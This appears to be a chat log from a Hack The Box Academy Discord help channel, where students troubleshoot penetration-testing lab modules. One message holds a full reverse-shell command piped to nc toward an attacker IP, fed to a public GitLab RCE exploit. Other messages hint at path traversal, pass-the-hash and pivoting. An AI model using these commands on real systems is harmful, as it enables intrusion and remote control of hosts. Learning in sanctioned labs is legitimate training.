#modules

It does?
I thought only the specific Azure ingestor and C# ingestor in the download section were the supported ones?

new collectors don't worth with old bh gui, but old collectors will work with CE

I think those are just official ones , but it suppose to work with old collectors

yeah that works with CE, just throw it in

hey guys. does anyone knows I why I am having this behaviour with curl but when checking in the source there is clearly more html to be shown. is this something you have encountered?

google said thats pure css tree i dont think curl can intepret that

i see. thank you box for using google for me :P. But in the module we are using curl to filter out these parts. maybe i need to think another way to do that. thank you loads @muted kindle

Yeah idk about the CE edition, I much prefer the old GUI

hi everyone
I have two problems
1 - the pentester/information-gathering/archivesweb/ room. For the question "How many Pen Testing Labs did HackTheBox have on the 8th August 2018? Answer with an integer, eg 1234." when I use Wayback machine on that date, I come across the page of a domain name seller.

2- the same room for the skill assessement "What is the API key in the hidden admin directory that you have discovered on the target system?"
I can't use any tool on the inlanefreight.htb

thanks to you

There is a file named revilkaseya.pcap in the /home/htb-student/pcaps directory, which contains network traffic related to the REvil ransomware Kaseya supply chain attack. Enter the total number of bytes that the victim has transmitted to the IP address 178.23.155.240 as your answer.

i put 3469 as answer but it says that's incorrect answer,

can someone give me a hint ?

Hi, I'm looking for more context of <b>Introduction to Digital Forensics --> Skills Assessment</b>
"Using VAD analysis" means "Windows.System.VAD" and which suspicious process meaning

Would I be right in saying that krbtgt doesn't always have a SPN assigned otherwise it would be an easy kerberoast and golden ticket attack?
The wording of a paragraph is throwing me off slightly as it says "there is one account with a SPN in the target domain" but the command output shows both krbtgt and mssqlsvc.

Hey Everyone, working through the Information Gathering-Web Edition module and am trying to complete the Creepy Crawlies section. I installed scrapy on the pwnbox and downloaded ReconSpider.py, but when I go to execute ReconSpider.py I get a ModuleNotFoundError: No module named 'scrapy.downloadermiddlewares.offsite'. How do I move forward since the error is in the ReconSpider.py?

https://discord.com/channels/473760315293696010/1257062567965364334

Right, I just found a PyPi for ReconSpider, am I suppose to use that?

No

That pypi is likely a different ReconSpider tool that uses a bunch of API keys

Gotcha, so then I guess I should be using what they posted in the module?

Correct

The erratum I linked to has the fix

Okay, thank you

And the tool author fixed it but ig it hasn't hit the backend

There's a reason it points to the academy backend for download instead of a pip install

Quick question about the Pass the Ticket from Windows lesson in the Password Attack module if anyone know, is there a reason we can PowerShell into the Domain Controller with only having john's Kerberos ticket? is it because John has permission or admin access to remote in to it?

Yes

That makes sense

I have some question related to htb subscription where can I ask

Support

https://help.hackthebox.com/en/articles/5986762-contacting-htb-support

thanks

--path-as-is https://<IP>/../../../../../../whoops
what does these escape sequences mean?

Path traversal

When you cd ../ you go back a directory

So chaining them you can go back to root

it seems v1.2 is now in the course material

how do you know you have to move up to six directories?

That's just the standard traversal amount people use

Could you use less? Probably. But doing more than what's necessary ensures you're in the filesystem root

Say you're in your home dir, you can use cd ../../ to get to root fs, but you can use more and still get there

because you are not sure which directory you're moving from?

Correct

When on doubt, throw more on

Got it, thank you for explaining.

Generally you look for a known file on the system to verify (/etc/passwd)

oh okay, in this case, its writing something to a text file called whoops, isnt it?

it depends

It could be reading the file

Executing it

in this section: https://academy.hackthebox.com/module/19/section/102
it says Since UDP is a stateless protocol and does not require a three-way handshake like TCP. We do not receive any acknowledgment. This seems like a typo, where there should be a comma in the middle. Is it correct as is?

Hey how do I chat in general?

no clue

I need help

How i chat in general

#1234357888114364508

Read and follow #welcome

same

That's how you can access #general

what's the channel for?

can anyone help?

oh nvm

I see

Guys can someone raid or hacka server

Captured vs displayed

No #rules

what?

I though this was the server to raid people bro

It's not

I mean raid servers

<@&861185840277487616>

Nope

If you read #welcome it tells you what the server is about

Look at your screenshot, it tells you how many bytes were captured and how many are displayed

👁️‍🗨️

i know, and the question asks for the bytes that were captured right?

displayed*

no, it just asks for how many was sent

i tried to sum all displayed packets' length and still incorrect answer

I'd say re-read the section as you likely glossed over something that would make this easy for you

can someone try to RDP into a machine on Password Attacks>Pass the Ticket (PtT) from Windows? or point me in the right direction to resolve these errors?

wrap the password in single quotes

i need help in the new skills check for the INFORMATION GATHERING - WEB EDITION skills assesment for the question "What is the API key in the hidden admin directory that you have discovered on the target system?". but i dont think i have discorvered a hiddin admin directory. am i missing something, someone pls help.

Look again in the module and then apply all the techniques shown. I'm sure you'll find what you're looking for

okay, thx

🤖

I'm working through the Fingerprinting section of the Information Gathering-Web Edition. I've run out of ideas for determining the CMS system of app.inlanefreight.local. I went through curl initially, but I don't see any options that will pull more information, so I shifted to using nikto. For some reason nikto isn't connecting to app.inlanefreight.local and I get an error saying "open stream: getaddrinfo problems (Name or service not known)". The command I used is nikto -vhost http://app.inlanefreight.local -host <IP> -Tuning b -Display DV. Any ideas what I'm missing?

is it in your /etc/hosts file?

It is not

ip app.inlanefreight.local dev.inlanefreight.local in your /etc/hosts

then that's why it can't resolve

I can try that

it's not hosted publicly; it's on the 10.129.x.x HTB network

meaning external routers/DNS can't reach it

also .local isn't a publicly routed TLD as far as I know

Hi, can someone go to waybackmachine and verify that this questions can be answered?: https://web.archive.org/web/20170501000000*/https://www.hackthebox.com/

For me, it shows like the above. I asked the support at the academy, they tested it but didn't point me in the right direction.

i didn't use nikto for this tbh i used whatweb

Right, but I'm using tge pwnbox?

.eu instead of .com

doesn't matter

you still need to tell your pwnbox where it's redirecting to

I answered these this morning

Okay, thank you

I see, thanks. Got it answered now!

Curious, then how did curl work for the other two questions?

i take it you did curl http://ip -H "HOST: app.inlanefreight.local" ?

That's correct

well it's because you're telling curl that the vhost you're using is app.inlanefreight.local querying that ip

but if you tried to visit it (without adding to your hosts file) in your browser, it won't load

as in http://app.inlanefreight.local

I did that with nikto passing in -vhost and then the IP as -host?

Further Credential Theft in windows privsec, does it require any vhost setup in /etc/hosts file. as it contains inlanefreight.local

idk how nikto works tbh

Okay, just curious

generally when you're given vhosts, you should add them to your /etc/hosts

as the guide itself is assuming this position that you've added it to your /etc/hosts

Noted😬

for some reason *.inlanefreight.local is not working

you can't use wildcards in /etc/hosts

ahhh

ehh

hi, mb somebody had this problem or know how fix that? *deleted
i also try to do sudo useradd -M -s /sbin/nologin 10.129.95.230$
sudo smbpasswd -a -m 10.129.95.230, but its not working

bruh idek what you're overcomplicating here

like all those commands you just referenced is hard overcomplicating this shit

also you don't need sudo to use smbclient

it helps if you tell us the module and section you're doing

it looks like there's some weird conflict with the smb server you have running

and not the target

password attacks, network services

I did the same on the pwn box but got the same errors

well

maybe john doesn't have SMB access

all the users for this section are unique

also those screenshots contain spoilers for john's login, i suggest deleting

it doesn't show he has read access to that share bud

again ALL USERS for this section are unique

you will not reuse any users for other questions of this section

WinRM user is different from ssh user is different from SMB user

ok, thx

look at the share name for your hint as to what user you might want to sniff for

I’m doing the “Cracking into HTB” path on the third module, part 8 anytime I’m using gobuster, its giving me this error with the provided host “unable to validate base domain: http://94.237.53.113:36235/ (lookup http://94.237.53.113:36235/: no such host)”

Gobuster dns -d http://94.237.53.113:36235/ -w name list.txt is the command I’m using

You need to add a --domain flag or have the site in your /etc/hosts and call it with http://site:port/

Hi, I'm doing the INFORMATION GATHERING - WEB EDITION model and I'm in the Virtual Hosts section and I'm stuck, I'm doing the following command
gobuster vhost -u http://94.237.59.199:34810/ -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt --append-domain and it doesn't work I don't know what to do I need to replace the List words? or add use another flag

You need a domain to append

Alright thank you will try that out

ha

--append-domain would append the domain from the http://ip:port

--domain is a way around it

--domain inlanefreight.htb

ty

Also I have 0 idea what module this actually is

It’s a beginner one

Brother just say the module name

Not the path name

I can’t find it lol anytime I go to the path it won’t give me an overview of them all

Oh it's the getting started module

And in the “in-progress modules” tab it doesn’t show up there

Ah that’s it? Thought that was different my b

Click the "enroll button" next to the cracking into htb skill path

It is indeed in my in progress tab

And it'll populate the list in your dashboard

I don't recall needing to use gobuster dns for this module

Hmm, it seems like that’s what I have to use since everything else doesn’t give me the flag but then I run into that issue

What section?

8 web enumeration

You're gonna feel so dumb

I bet

Use dir first

Lmao

With the common.txt

Yeah I was having trouble finding the path for common.txt

But I just found it

Not the same as in the example

Yeah example is using the old pwnbox version

Ahhhh makes sense

find / -name "common.txt" 2> /dev/null

tried the obvious

Hopefully it's smooth from here

I also suggest using your own vm

Makes everything a lot smoother and more controlled

nvm

Haha yeah thank you just wanted to do the beginner to get aquatinted with HTB, and yeah I figured it out now

I would but I’m doing this all at work lmao

Lol yeah

I lied I assumed now that I need to go in order but any of the domains I use can’t be found must be looking in the wrong place

You don't need a domain

You can visit http://ip:port in the browser

And http://ip:port/[found file/directory]

👀

It's why I said to use dir and not dns

Dns isn't required at all for this exercise

Well I cannot recover my email

Skill issue

I figured it out my b, didn’t think it would be that easy was trying too hard lol

But not something anyone here can help with

It's the "getting started" module. It doesn't get simpler than these

It's not actually I forgot change my old number to new number
I set my email as recovery

This how I became dumb

Again no one can help you with that

I am getting crying and crying over if no one help about those password.
I am just child with fragile mind in adult

https://tenor.com/view/michelle-tomlinson-does-not-want-finn-as-mod-gif-17112295783149218487

womp womp

Reach out to the support team that you're locked out of

Worst thing is I cannot remember the password

we are not staff

This feels like beyond HTB

Actual Email issue

can anyone advise on the skills assessment for broken authentication? I'm having some trouble with the 2fa

I reached to the staffs

Then be patient

Sounds like dangerous people with password cranking

^^

Nothing can be done for you on the discord brother

Don't ask for help on discord. Rule no.456

especially if you just yapping away in here T-T

Well don't ask for something that literally can only be helped via support channels

Support didn't do anything 😭

Wait for them to see your ticket.

They like " they cannot do reset at their end"

https://tenor.com/view/holes-grandpa-thats-too-damn-bad-gif-15698581

What exactly are you locked out of?

oh well just make a new account 🤷‍♂️

Your HTB account? Your actual email?

The password and I forgot to change recovery email and phone numbers

imagine its the actual email acc

That doesn't answer the question

my guess he doesnt have access to the email he put on htb so he cant reset it

This sounds like your actual email account

Yeah

How do I solve this lab, who can help ?

Yeah so stop bitching in discord

bro how would htb solve that LMAO

Reach out to your email provider for support

go reach out to google or make a new account LMAO

https://academy.hackthebox.com/module/108/section/1233

Are you logging into https://[target_ip]:8834

From there, there are prerun scans for you to analyze

Everything you need to know is in the previous sections

like what

Analyzing the scans

It sounds like you didn't do shit or read anything

if u confused i suggest re-reading the section LMAO

its pretty simple and straight forward

This is regarding the nessus vuln assessment; all the sections in the nessus subsection teach you how to use nessus

Yes, i,m still a beginner

I did but state ID won't provide because Indian people don't know about that lol

Well you can't learn if you don't read

oh i see and ^

That's too fucking bad

bro what are we suppose to do?? what do u expect 💀

To sum it up @reef stratus no one here can help you

My last option was search password cranking

I strongly recommend stop asking

This is illegal

You don't own your email account, the provider does

a simple solution is make a new account 👍

But I don't know which sections I should start with

re-read it all...

Bro I am actually crying and going through panicked

Well nothing anyone here can do for you

We simply do not care

Fine...

also if something doesn't make sense google and youtube are your friends, nessus is one of the most known tools literally type it into youtube youll understand most of what you need

saying that in a discord is wild

<@&861185840277487616> they keep bugging about wanting someone or help attacking their email that they're locked out of

https://tenor.com/view/ive-been-summoned-berry-mint-gif-26570751

It's not about attacking

Yes.it is

💀

what

Bruh

Password cracking is attacking

Re-read the module up to the nessus assessment

There's the working with nessus scan output section that also may be helpful

and if something doesnt make any sense while your reading it you can come here for help

But we can't help you if you're too lazy to read the info

^^

Of you're doing any of the cert paths it's highly encouraged to take notes

Need help in the Password attack path PTH (pass the hash) section, the question about \DC01\David\david.txt

Just do the thing

Make sure you're adding /run:cmd.exe to launch the new cmd prompt with the user

yeah thats what im doing

with miminatz, from local Admin on MS01

specifying domain also. Maybe my machine is dead ill try resetting

If a new cmd prompt opens, it works

Can anyone provide advice on the skills assessment for broken authentication? I'm encountering issues with the 2FA implementation. Any tips or guidance would be greatly appreciated.

Iirc you don't need to bruteforce it

Hmm, I'm not sure what else to d

look again in the module. It shows you various techniques

in the Windows Event Logs & Finding Evil module it seems evil to put the mimikatz question last its so much easier than the other 2, I felt like faceplanting my keyboard before that one haha

omg nvm im so stupid i had it from the start..., I was chcking who I was logged in locally

im a bit confused in the Web Recon - Skill Assessment section

the website does not seem to have much to play with

i had done this before the update and the questions were different

weird 0_0

hints are in the beginning part of "need to apply a variety of skills learned in this module including:"

I'd recommend redoing the questions, even though you can't change the answer

yeah i have do so so far

Did you identify x.y.inlanefreight.htb?

Also: don't forget to add any found subdomains to /etc/hosts

oh the question said vHosts needed for these questions: inlanefreight.htb so i didnt go much into finding vhosts

That's just to start

If you can't find something: start digging

i tried going with subdomains even though the question seemed to suggest otherwise, didnt think of trying one like x.y.inlanefreight.htb tho thanks

Well you gotta find y before x

Subdomains-top1million-110000.txt is usable for both

maybe i only tried the 20000 before though

Yeah I double triple checked and the subdomain is only on that and the combined list (which is about 60x larger)

great i thought of trying but honestly i was skeptical of enumerating subdomains because of how the question was phrased

and got it indeed

It's the wordlist showcased throughout the module btw

@fathom pendant https://imgur.com/a/pCH8WYP same problem, this is the fourth login data they are unique but the error is the same

Well like I said it looks like whatever you did earlier is fucking with you being able to connect to the target

Take out the -P argument and see if putting in the password that way works

no

do_connect: connection failed NT_STATUS_NOT_FOUND

Well that's a different error at least

try using the impacket smbclient maybe

Wait

Your // are the wrong way

It's either \\\\ip\\share or //ip/share

yes it already works

thx

The reason for \\\\ is that bash will interpret it as \\

Because \ is the escape character

yeah it was all easy after understanding the correct wordlist indeed

thank you

Np

ReconSpider (HTB) is goated btw

yeah it is actually pretty useful. maybe i could have struggled a little with the double subdomain because it is something i havent found before doing HTB machines and i dont usually test it, but i guess at some point i would have tried it

i guess next time im stuck it will come to my mind way quicker

All about walking away with new knowledge instead of beating yourself up over it

Doing the live engagement of the shells and payload and trying to get a hostname of host 1, trying to enumerate using nmap but even a -A isn't giving me anything I'm pretty sure there should be an rdp port considering the question, should I just scan directly for rdp?

You need to rdp to the jump host to scan the internal targets from

(Or use host 1 as a jump host)

When running nmap it shuts down my rdp though

Running nmap from the jump host?

Btw jump-host I'm referring to the 10.129.x.x target spawned

Hosts 1-3 are internal to the jump host

On the 172.16.x.x network

Wait so I'm not supposed to be running nmap directly on the host but on the jump host?

Ok so let's break this down

You can only access the jump-host [10.129.x.x] from your machine
The hosts are on the 172.16.x.x subnet [which the 10.129.x.x host has access to]

tracking

You need to either pivot through the jump-host, or use tools on the jump-host to scan and exploit the hosts

The jump-host is a parrot attack-box

Hmmm I'm a little lost there, I understand what you mean however I need to think on the method

I belive a network digram is provided in the section

^

You need to use the jump-host [10.129.x.x] to scan the hosts 1-3

Okay I think I'm tracking now

I think one of the biggest things I learned is that you can do protocol://(ip/site) to try and access a site via that protocol over a browser

thanks for the help btw

yeah surprisingly browsers can do a lot of things

my firefox even works as a file explorer

file://path/to/file yeah?

yep

Anyone have a guide to installing crackmapexec on the HTB parrot machine?

Use netexec instead

https://www.netexec.wiki/getting-started/installation

Crackmapexec is archived and no longer being maintained

cme is obsolete with nxc now

Netexec is the same tool (literally)

Tl;Dr the main people updating and actually maintaining cme did not like the direction the repo owner for cme was going, so they forked it

There is a free installation and lab:
https://www.nameyourpricetraining.com/courses/b6ce7e4c-5748-4272-b776-c400481791f6/take/content

Thanks!

Thanks everyone. Finally make some headway on the password attack module 😓

oh wicked to know that about cme I'll bookmark that for when I need it, thanks.

If you wanna dive fully into the reason, you can read the discussion on the cme github

has anyone completed the windows evasion technique module?

and sorry Hi (losing my decency or what)

it helps if you state what you've tried, what section you're working on so that people aren't just suggesting you to try what you've already done

https://dontasktoask.com ; https://nohello.net

okay,
Introduction to Windows Evasion Techniques

Page 3
Static Analysis

Static Analysis

got this but no flag appear. wonder if it's normal

well if no flag appears, then you're likely doing something wrong

it's getting deleted because it's large block of text and your account isn't linked ( #welcome )

ok

ok so the cat.log text display it's 'OK' but apparently is not

can't paste it cause too big app

your project configurations need to be excatly the same as the module's

Further Credential Theft in windows provesc, i got the winscp creds. but it is not getting connected. it says tr******.inlanefreight.local does not exist

Password Attacks>Pass the Ticket (PtT) from Linux: having issues understanding what "export KRB5CCNAME" is supposed to be. I have set it to "julio" & tried to get the file as instructed but smb wont connect

oaky... that seems corny a bit but okay

Hi, I'm completing Information Security Foundations and have hit a problem with the Windows 10 VM: it does not exist. I downloaded 23+Gigabytes of what I thought was the Windows 10 Developer Evaluaton VMware machine, but it does not install, as there is nothing to install after extraction. What have I missed?

you want to install a windows 10 vm? use media creation tool to make an image or get an iso

anyway it feels kinda weird cause when the module start they're disclosing not to do the module anywhere else than their vm but like first real question is litt something you can't do on the provided vm cause it's the target one and not the dev one so you have to do the compiling stuff on your own vm, feels odd

that's not the right environment variable to set

it felt wrong doing it, i'm at a loss

check the example

@next bronze I am following explicit instructions on what and how to install Windows 10. I have an installation of VMware; I have installed ParrotOS on the VM. The task now is to install Windows 10, but the description of the download is that it is a pre-configured VMware machine. This is where I am having a problem. There is no installation media for Windows 10 VMware, or at least, I have been unable to find it among the 23 GB of data I downloaded.

thanks I was getting mixed up in my notes

like I said, you should install the proper way using media creation tool to make an image or get an iso, there are youtube videos on how to do that. if you want to use the premade vm you can just open the ovf with vmware, but that image is bloated as hell

@next bronze Okay; I'll give both a try. Thank you.

If they update a module do you have to redo it again to complete the cpts pathway? One of the modules I completed says I have more to do now?

Thanks for your help. I used the .ovf installer; Windows 10 is up and running.

As far as I know, no. It’s still marked completed. But it probably would not be a bad idea to go over the updated version a few times, as I do not know if those updates are reflected in the CPTS exam.

I'm definitely going to do all of them again. Just weird having my completion level just drop since it definitely went from view to continue

only if you reached 100% path completion prior to the update

Damn noted

Marcie knows for sure. I was just guessing. Don’t listen to me 😂

😂 still appreciate the response

i mean the only people with the actual knowledge is support

so if you really wanna know, bug them

Yeahhhhh I should not have responded tbh

my knowledge comes from the last time something like this happened (The addition of the thick clients to common apps

i did that b4 so i help u in like 30 min

bro how did i not know about this https://help.obsidian.md/Editing+and+formatting/Callouts

Okay, I'll reach out when I'm ready, need to put our oldest to bed

:)... im 14 years old, could technicly be your son 😂

okay ready to help, so basicly when i was doing the question i didnt know what a cms what so i asked chatgpt "in the context of this question what is a cms" and it replyed by telling me what it was and listing some common ones, then i ran whatweb and searched for a common cms and if u do that you should find your anser

it also helps that it even says "Content Manager" in the tag for it

i've had wappalyzer be hit or miss with this question tbh

some people get it, some don't

😭

whatweb doesn't fail me 🙏

if you don't believe me go back and look at the whatweb output

nonono, i used whatweb

yes

I think way back when i did this (yes it's a repeated target from the previous iteration) I just looked for the most common word in the source code

if you also view the page it also says it multiple times

sometimes you can make leaps of logical deduction

"man this is repeated a bunch of times..."

yes

it's just knowing when you can safely make the logical deduction, and when to continue digging

also why did u comment robot i checked robots.txt but it is not there?

there's definitely a robots.txt on one of the subdomains for the hidden dir

ah, havent checked that... big brain

will do

but good deduction that i was referring to the robots.txt

Hey its funny but I can't close this chat

support will close the chats on their end

just click the green bubble to minimize the chat view

When I press, opens this another

But no problem, Ill disable it, thanks!

ah

weird issue ¯_(ツ)_/¯

yes >_<

someone pls help:

Does anyone know why it’s not working for me, and if it’s not a problem on my part who should I contact so I can finish it.

not working (wanna find subdomains)

for the info gathering web iditions skills check

idk why its not working anymore

i tried restarting and reseting host

I've had extensive issues with the info gathering web edition skills check as well. Couldn't seem to get it working. I finished it months ago before they updated it, have issues going back to it now.

I just decided to move on for now @rustic sage

Hi everyone,
Can someone help me out? I'm in the AD Module | AD Enumeration & Attacks - Skills Assessment Part I. I'm about to get the last user and password, but the command just isn't working.

thc u (now ik not just me) will ask ing help section

You actually don't need to do the labs again. You can bypass the module by simply completing the new pending reading.

Yes, I know that. Still not bad to go through again to refresh and check in on the new content they added. 🙂

They changed many of the questions in the module, so the listed old answers aren't actually correct for the new questions. Wish they would either reset it or give us the option to reset it.

your proxychains is timing out

what do u mean?

how can i bypass

bc having much isues with this

What does this mean

How can I do pleat the module if not working

Literally just navigate through all the sections of the module until you have no pending sections left to complete. This works only if you already completed the module before the update. This allows you to bypass=complete the module without doing all the labs again

If this is your first time going through the module, you are fine. I finished the module months ago before they updated it. My old answers to the old questers are still there, but there are new questions. It doesn't matter for you, just for people who did it before the update

😆

lmao. i can't ping to the IP lol.
That is why is timing out right?

Thank you, I'll give that a go shortly

Are you pinging from the PwnBox or your own personal? Further, is that host actually up?

U should try ligolo
Proxychains doesn’t support icmp

that's a different subnet, you'll need to pivot

PwnBox. i found that IP this monday and maybe is not the same now.

Do you have any hint on why proxychains is timing out?

Did you write 172.0.0.1 instead of 127.0.0.1 in /etc/proxychains.conf?

Yeah i did

It is up and I have tried both own box and personal

That was it lol

Yes that didn't help ^^

Still timing out. 😦

But i think it does matter, I just started it today and final part not working

Very confused

Ahhh

do you have the port forwarding set up?

I used ligolo-ng and not one of the other methods that involves proxychains so I wouldn't know

you need to have a listener within the network that allows you to forward the request through that socket

@rustic sage @fathom pendant I used whatweb and got it, I'm still curious to get nikto working, but I can wrestle with that later. Thank you both for your help!

Np

Does anyone know why this is not working? And if it’s not a problem on my end who should I contact to get it fixed?

During this module you may want to try ligolo-ng too (like several people said)
For your problem, maybe you need to use socks4 127.0.0.1 9050 instead of socks5 127.0.0.1 1080, not sure what netexec supports

use a different wordlist

Okay, thx will try (if all it was was the wordlist will rage)

Got it, thank you all. Much appreciated!

it also helps to use inlanefreight.htb:port instead of the IP for --enum

Okay

Thc u

what section are you on?

Skills check

then yeah

use the subdomains-top1million list that's been referenced a lot in this module

it will be useful to add -r as well to the dnsenum command

as a note; add all found subdomains to the hosts file on the same line as the inlanefreight.htb entry

you can put multiple entries on the same line
ip entry1 entry2 entry3 ...

Thx ( I already knew but Thc u for help… will run with bigger worklist now)

After that just enumerate the found subdomains

Ok

not working dont think its problem with wordlist not resolving: inlanefreight.htb:37582 NS record query failed: NXDOMAIN

Don't worry about that part

?

But that’s the last part it doesn’t run the wordlist not fuzzing at all I don’t think

Also not working with ffuf

It’s as if not recognizing what’s in hosts file

Like dns broken or smt

nah

?

Hdsksjsjsjsjsjkwjf xxs

Rage

i used ffuf for this

not dnsenum btw

dnsenum really only works if DNS is running btw

bros having a seizure

gobuster also worked for me

Here’s what I will do, will submit vid of me trying to do it in help section so u and others see

idk what to tell you dude

ffuf and gobuster worked for me

what's your ffuf command?

Almost

is he doing the footprint module?

nah

the information gathering - web edition

skill assessment

ah gotcha

Doesn’t work even after u let it finish

that's not how you fuzz for hosts

vhost*

ffuf -w <wordlist> -u http://host:ip -H "HOST: FUZZ.host" -ac

it's taught how to do this in the module

at least with gobuster

Ah fk ur completely right I totally forgot 💀

loll

Thc u so much

gobuster vhost -u http://host:port -w <wordlist> --append-domain

you can also increase threads

just tested mine with 100 threads and should be safe

-ac autocalibrates and throws away the junk responses btw

shiiiiet 1000 threads works too

gobuster does not like 1000 threads

also your wordlist is wrong

you went smaller not larger btw

the previous list you used was 20000 current 5000

@rustic sage I just spun up a target and ran the commands to enumerate and stuff and it all worked as intended

also to add on- with results.json from the ReconSpider tool; you can do cat results.json | jq -r '.[key]' (replacing [key] with the json key value, leaving the leading .)

the key values are in the creepy crawlies section if you wanna look it up

Thc u, will do… not yet though in 2 days bc bed time rn and tmr have flight

rest well brother have a safe flight

Thx, u too

Can I get a hint on Enumerating API section of Advanced XSS and CSRF Exploitation module.
I'm getting error: "NetworkError: Failed to execute 'send' on 'XMLHttpRequest': Failed to load 'http://api.vulnerablesite.htb/v1/sessions'."
I've tried payload without credentials,
I have tried fetching authentication bearer from localStorage but my payload returns null
I have tried payload that makes use of iframe but no luck as well

this may sound silly but is the api.vulnerablesite.htb in your /etc/hosts?

Hi Guys, I just started the CPTS path and in the Getting Started module, specifically the Privelege Escalation section, I'm trying to transfer the "id_rsa" file to the pwnbox. It seems i'm missing something basic here.

What I've tried: I tried copying the file to the user2 folder, which wroked. From there, I tried copying to the pwnbox which didn't work.

Any help will be appreciated. Thanks

just copy/paste

I don't believe it's meant to be, the simulation tries to mimick an internal API that's not reachable directly. So the idea is attacker targets http://vulnerablesite.htb, adds XSS payload, wait for admin victim to click on payload which then tries to get internal API http://api.vulnerablesite.htb

cat the file, select it all, ctrl+shift+v --> open a text editor, ctrl+shift+v in the text editor, save

try and see?

ok will do

either that or your payload has to indirectly reference the API

somehow

@fathom pendant It worked. It's silly of me not to have thought of it. lol. thank you

in a public server DNS would normally route it, however these aren't public internet servers (even if using a public_ip:port, the domains/vhosts aren't publicly routed

https://tenor.com/view/its-that-simple-booger-brown-the-cowboy-way-easy-piece-of-cake-gif-17822561

noted. thanks

the only time public servers are involved are when they have you attack inlanefreight.com (these happen on occasion, it is a site owned by HTB for use in pentesting practice, it's registered so you can always access it)

if you hadn't noticed the fictional company inlanefreight LTD keeps popping up in these environments 😉

Actually I have. I did a recent module lab on it

yup; and I can understand initial hesitation to go after a .com site, but it is 100% allowed :)

idk if they changed a lot of it for the info gathering module, but they had you previously do basic recon/tools like whois; dig queries; etc to get basic info about sites that have a public bounty program and the scope is there

I'm yet to start the info gathering module so I speak to it

But I'll keep that in mind

imo the update they did clears a LOT of stuff up

and the skills assessment wants you to use practically all the skills and tools from it

i'd say it should take ~ 30 minutes with no hiccups, ~60 minutes if you get hung up on something/start overthinking

Sure. I looking forward to it

that didn't work, I think the trick is in bypassing CORS restriction but I have exhausted all tricks I know to bypass e.g. change GET => POST, use <iframe>, remove withCredentials

i haven;t done this module truthfully but i wish you luck in getting an answer ¯_(ツ)_/¯

Hi
Module: Attacking Common Applications
Section: Attacking GitLab
Question: gain remote code execution on the GitLab instance? Submit the flag in the directory you land in.
Here, I found the user named Dxxx, could you give me a hint how to find his password? I tired hydra with rockyou.txt but all passwords are false positive.

i dont remember on the top of my head but have u tried to see maybe there is a password somewhere in the gitlab?

if u havent already

i didnt find anything. i do check that

maybe check the version of the gitlab and see if it has any exploits

im getting this error tho : listening on [any] 8443 ...
connect to [10.10.14.114] from (UNKNOWN) [10.129.162.93] 54164
bash: cannot set terminal process group (1281): Inappropriate ioctl for device
bash: no job control in this shell
git@app04:~/gitlab-workhorse$ exit

while getting the rce.

using this exploit: https://www.exploit-db.com/exploits/49951

well it is a authenticated exploited and since u havent found the correct password for the user which could explain why it fails

it looks like you're typing exit at the end there...

after you get the user@host...

or that too

it doesn't look like it fails... it looks like it exits

that error is a standard error for a lot of service accounts with bash

ah got it

it just means it doesn't have a profile set ¯_(ツ)_/¯

as most app/services won't have a profile/bashrc

true true

i definitely feel like he just saw the bash errors and typed exit after it loaded...

no i didnt

well something added the exit command at the end

try again and see 🤷‍♂️

at least from the tidbit you showed

||python3 rce.py -t http://gitlab.inlanefreight.local:8081 -u Dxx -p pxxxx -c 'rm /tmp/f;mkfi^C /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 10.10.14.114 8443 >/tmp/f '|| well this was the comamnd i used. the rce.py script is : https://www.exploit-db.com/exploits/49951

the acc Successfully Authenticated
but its exit automatically

is the ^C part of it?

nah

just to make sure lol u did copy the command shown on the section since its the same exploit

but even after removing ^C i get the same errro tho

yeah i did correclty

and it just exits once u connect?

that's weird

is cryptography in oscp?

define what you mean by that

cryptography is kinda broad

like rsa key and stuff

it can be used to mean password hashing

potentially

like decryption like in the brainfuck

no

haaaaa yeah damn yes working

there was an ecrypted sentence

you won't need to do any advanced decryption

just your standard hex/b64

like decryption for this in brainfuck Mya qutf de buj otv rms dy srd vkdof 🙂

Pieagnm - Jkoijeg nbw zwx mle grwsnn

A admin
Apr '17

Xua zxcbje iai c leer nzgpg ii uy...

O orestis
Apr '17

Ufgoqcbje....

Wejmvse - Fbtkqal zqb rso rnl cwihsf

A admin
Apr '17

Ybgbq wpl gw lto udgnju fcpp, C jybc zfu zrryolqp zfuz xjs rkeqxfrl ojwceec J uovg 🙂

mnvze://zsrivszwm.rfz/8cr5ai10r915218697i1w658enqc0cs8/ozrxnkc/ub_sja

O orestis
Apr '17

Si rbazmvm, Q'yq vtefc gfrkr nn 😉

Qbqquzs - Pnhekxs dpi fca fhf zdmgzt

like what would yo ucall this kind of decryption?

so i acn learn

The Active Directory Enumeration & Attacks module has sooo much information. Been working through it and taking notes for three days now 😅

this isn't required for OSCP

reminder: OSCP is an entry cert also this question belongs more in #careers-and-certs not here in the modules channel @sleek moss

Hello
Module Introduction to Python 3
Im upto Managing Libraries in Python and trying to install flask with pip but when I try it says error: externally-managed-environment and wont let me progress, What am i doing wrong?

add --break-system-packages

python 3.11+ introduced the "EXTERNALLY-MANAGED" File

you can also remove that file as all it is is a simple flag file

you can install flask with pipx

my monthly subscription has expired but still I can use unlimited pwnbox
why?
is there any reason?

because you spent money

yes, that's the legit reason

if you spend any amount of money/have had a subscription you still retain the unlimited pwnbox

Will I get this benefit for lifetime? @fathom pendant

yes

ReconSpider is causing many error when try to install, anybdoy also hhave/had this problem?

no errors here

you may need to add --break-system-packages if you hadn't deleted the "EXTERNALLY-MANAGED" File in your python install

thanks!

good morning/afterrnoon to all. I have some issue with the Web Attack module i can not recreate what is asked during the explanation of the module. It requires us to use this curl command to grep some parts of the html but this is not perform on the live target when i try. curl -s "http://SERVER_IP:PORT/documents.php?uid=3" | grep -oP "/documents.*?.pdf" The HTML code that needs to be grep it does not come up even if it is in the source code when i look manually.

well did you swap out the target:port to the target IP and port?

i,e, 94.234.87.99:36578

anyone DM for advise on the skills assessment for broken authentication? I'm having some trouble with the 2fa i tried all, brute force, Bypasses, session attack ...

You can send me a DM

Hello everyone, I'm having troubles with "INTRODUCTION TO ACTIVE DIRECTORY" module, I'm supposed to connect to a pwnbox and connect via rdp to a windows machine, I can connect and I accepted the certificate but It cannot load the remote machine, just blackscreen untill I get disconnected.

Am I doing something wrong or is pwnbox overloaded right now?

press enter when you get the blackscreen

I managed to load after 7th attempt, thanks

is there any way to resize xfreerdp window?

I jst cannot see windows start

you need to use /dynamic-resolution in your xfreerdp

you need to first crack it open before being able to parse it

it's explained, you just didn't read

thanks

throw hashcat at it and you'll be surprised

they also show how to grab it via nxc/cme

but it's with secretsdump.py

to extract

